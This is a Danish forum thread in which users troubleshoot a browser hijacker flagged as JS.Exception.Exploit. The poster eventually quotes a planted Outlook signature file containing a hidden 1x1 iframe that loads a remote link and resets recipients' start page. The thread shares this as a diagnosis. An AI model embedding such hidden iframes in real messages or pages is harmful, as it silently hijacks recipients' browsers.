JS.Exception.Exploit

jeg har haft de to filer og fået dem slettet

den er fra en hjemmeside

oki.. hvordan?

kan hovedsageligt være fra en hjemmeside da den bla benytter <applet>'s

..Har jeg læst mig til..

Kendetegnet er at den f.eks. ændre din start side til at åbne i "porno sitets"

DØD irriterende..

MEN den bliver også distribueret via mails.

hvilken problemer er d u løbet ind i  da jeg har fået vrøvl med og åbne i et nyt windue

jeg har "kun" slettet de js.exception.explorit

Jamen, den ændre sådan set bare start siden.. det er det eneste denne gør .. der findes vist forskellige varianter af den.

hmmm efter hvad jeg har læst om den er det også trojan

jeg lod nav scanne hele lortet alle filer og da den fandt dem kunne jeg ikke slette dem fordi explore bruger dem men sæt dem i karentæne så kan du slette dem manuelt det gjorde jeg

Jeg ahr nav corporate edition og den gider sq ikke finde den/dem :-(

Men nu må vi se hvad det bliver til nu går jeg ind og sletter dem  manuelt på alle maskiner og fjerne unødvendig post på maskinerne..

og jeg har foretaget live update..

ja min er nav 2000 den man kan hente hvis men bruger tdc

ja, det er en af de svære. Har du prøvet F-Prot?http://www.avirus.dk/startf-prot.htm
ellers må du nok i gang med at formatere.

Har du prøvet med Ad-Aware? www.lavasoftusa.com

goulduck, ja har prøvet adware fra megageeks.com eller hvad den hedder, meget fedt program alle burde bruge det :-)

majorgeeks.com var det :-)

Perhaps, nej har jeg ikke endnu, men..

Alle de andre, norton, ad-ware me. fl. fider inge ting.. men der er en mail server der bliver ved med at afvise vores email med følgende besked:

Network Associates WebShield SMTP V4.5 on ita31 intercepted a mail from
<apoteket@albertslundapotek.dk> which caused the Content Filter iframe to be triggered.

skummelt :-/

Ok, har fundet ud af at der kører 2 program filer, (ved at klikke alt+ctrl+delete).

Disse 2 hedder:
0crawr32
0craware

Og umiddelbart kan jeg ikke finde ud af hvad de bruges til, andet end at når de kører= Så vedhæfter den virusen på udgående mail, når de ikke kører, kan virusen ikke blive akitveret på min egen maskine. (I begge tilfælde har jeg sendt en mail til mig selv).

Skummelt ikke?
Jeg gir op.. hi hi

Sikker?

ocraware ocraware.exe Optical Character Recognition software as part of OmniPage Limited Edition - supplied with most scanners. Scan directly into most word processor applications, such as Word, WordPerfect, etc. Available via Start -> Programs - not required

Læs evt. http://www.spywareinfo.com/hijacked.html

HEJ ALLE!!

Hold kæft hvör var denne tricky.. og så alligevel ikke.

Men jeg vil lige give jer en update...

Grunden til at jeg ikke kunne sende mails til nogle mails konti fra outlook var ar der på en eller anden måde var kommet en autosignatur fil ind på computeren, som lå lokalt. C:/program files/sign.htm.

Outlook var sat til at bruge denne fil som signatur og filen indeholdte følgende:
Sådan havde de opbygget filen, som automatisk eller via. en bruger fra apoteket havde gemt sig på c:/program_files/sign.htm

Samtig havde den ændret signaturen i outlook, så den brugte denne fil: sign.htm:

<html><head></head><body><iframe src=http://"server"/link.cgi?ref=7223 frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no> </iframe></body></html>

Det vil sige at hver gang man prøvede at sende en ny post fra den pc, kom der en lille 1*1 pixel stor klat frem i dokumentet. (Som jeg ikke havde set før jeg var opmærksom på den).

Hver gang folk modtog den, vil de så via. den iframe som sign.htm kalder, få en ny tilfældig start side, i dette tilfælde en pornoside.

DØDSYGT, det har kostet mig meget tid, håber nogle af jer kan bruge det til noget... Men jeg hapser selv pointene denne gang, da jeg jo ligesom selv fandt fejlen, men alle skal have tak for at forsøge at hjælpe mig..

Venligst
Michael

kapla0 > Du havde ret det var et scanner program, men det havde ingen betydning, da vi ikke bruger det..